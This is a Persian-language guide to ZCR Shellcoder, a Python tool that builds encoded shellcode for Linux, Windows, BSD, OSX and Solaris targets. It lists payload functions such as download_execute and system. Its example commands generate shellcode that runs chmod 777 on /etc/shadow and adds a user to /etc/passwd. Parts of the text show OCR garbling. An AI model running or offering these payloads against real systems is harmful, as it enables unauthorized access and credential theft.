ZCR Shellcoder

نویسنده : علی رزمجو

ZeroDay Cyber Research Shellcoder (تولید کننده) یک نرم افزار متن باز به زبان پایتون میباشد که به شیا امکان ساخت شلکد سفارشی (custimzed) را برای سیستم عامل های لیست شده میدهد. این نرم افزار توانایی اجرا در 2.7.x را دارد.



برای نشان دادن لیست سویچ ها ، سویچ "h-" یا "help-" یا "help-" را اجراکنید.

```
ZeroDay Cyber Research Shellcoder

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ! version: 1.0.0 ! Release Date: 2015 May 22
```

سویج OS- به شم اجازه میدهد تا سیستم عامل تارگت (هدف) خود را انتخاب کنید. برای دیدن لیست سیستم عامل ها از سویج OSlist- استفاده کنید

```
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x86
[+] solaris_x64

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویچ 0- جممت انتخاب نام فایل خروجی شما را که در پوشه output تولید خواهد شد میباشد.

سوپچ **job- جم**ت انتخاب فانکشن (Function) برای تولید شلکد میباشد. شیا میتوانید با استفاده از سوپچ **joblist-** لیست فانکشن ها را مشاهده کنید.

```
[+] exec('/path/file')
[+] chmod('/path/file', 'permission number')
[+] write('/path/file', 'text to write')
[+] file_create('/path/file', 'text to write')
[+] dir_create('/path/folder')
[+] download('url', 'filename')
[+] download_execute('url', 'filename', 'command to execute')
[+] system('command to execute')
[+] script_executor('name of script', 'path and name of your script in your pc', 'execute command')

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویچ encode- جمت انتخاب نوع انکود(Encode) شلکد خروجی میباشد، برای مشاهده لیست انکود ها از سویچ types- استفاده کنید.

```
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc_timesyouwant
[+] inc_timesyouwant
[+] dec
[+] dec
[+] dec
[+] dec_timesyouwant
[+] mix_all

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویچ update- جمت آپدیت کردن نرم افزار استفاده میشود، همچنین شها میتوانید آرشیو فایل ها را در لینک زیر مشاهده کنید.

https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive

و آخرین آپدیت در اینجا در دسترس میباشد : https://github.com/Ali-Razmjoo/ZCR-Shellcoder

و: http://www.z3r0d4y.com/p/zcr-shellcoder.html

ویژگی های موجود:

OS_LIST / Functions	Linux x86	Linux x64	Linux Arm	Linux Mips	FreeBSD X64	FreeBSD x86	Windows x64	Windows x86	OSX	Solaris x64	Solaris x86
exec	1	0	0	0	0	0	0	0	0	0	0
chmod	1	0	0	0	0	0	0	0	0	0	0
write	1	0	0	0	0	0	0	0	0	0	0
file_create	0	0	0	0	0	0	0	0	0	0	0
dir_create	0	0	0	0	0	0	0	0	0	0	0
download	0	0	0	0	0	0	0	0	0	0	0
download_execute	0	0	0	0	0	0	0	0	0	0	0
system	0	0	0	0	0	0	0	0	0	0	0
script_executor	0	0	0	0	0	0	0	0	0	0	0
ШШШШ		Ш	Ш	Ш	M	W		Ш	Ш		
Encodes				HI	MI	Ш	Ш	Ш		Ш	Ш
none	1	1	1	1	1	1	1	1	1	1	1
xor_random	0	0	0	0	0	0	0	0	0	0	0
xor_yourvalue	0	0	0	0	0	0	0	0	0	0	0
add_random	0	0	0	0	0	0	0	0	0	0	0
add_yourvalue	0	0	0	0	0	0	0	0	0	0	0
sub_random	0	0	0	0	0	0	0	0	0	0	0
sub_yourvalue	0	0	0	0	0	0	0	0	0	0	0
inc	0	0	0	0	0	0	0	0	0	0	0
inc_timesyouwant	0	0	0	0	0	0	0	0	0	0	0
dec	0	0	0	0	0	0	0	0	0	0	0
dec_timesyouwant	0	0	0	0	0	0	0	0	0	0	0
mix_all	0	0	0	0	0	0	0	0	0	0	0

نمونه دستورات اجرايي:

Windows cmd:

python shellcoder.py -os linux_x86 -job chmod('/etc/shadow','777') -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job write('/etc/passwd','Ali.......[add user]') -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job exec('/usr/bin/python') -encode none -o shellcode.asm

Linux and OSX Terminal:

you need to put a "\" behind the "(" and "'" char in your switch.

python shellcoder.py -os linux_x86 -job chmod\(\'/etc/shadow\', \'777\'\) -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job write\(\'/etc/passwd\', \'Ali.......[add user] \'\) - encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job exec\(\'/usr/bin/python\'\) -encode none -o shellcode.asm

برای اطالاعات بیشتر و آنالیز برنامه و راهنهایی از وبسایت <u>z3rOd4y.com</u> بازدید فرمایید.

منبع

ZeroDay Cyber Research z3r0d4y.com

home: http://z3r0d4y.com/zcr-shellcoder/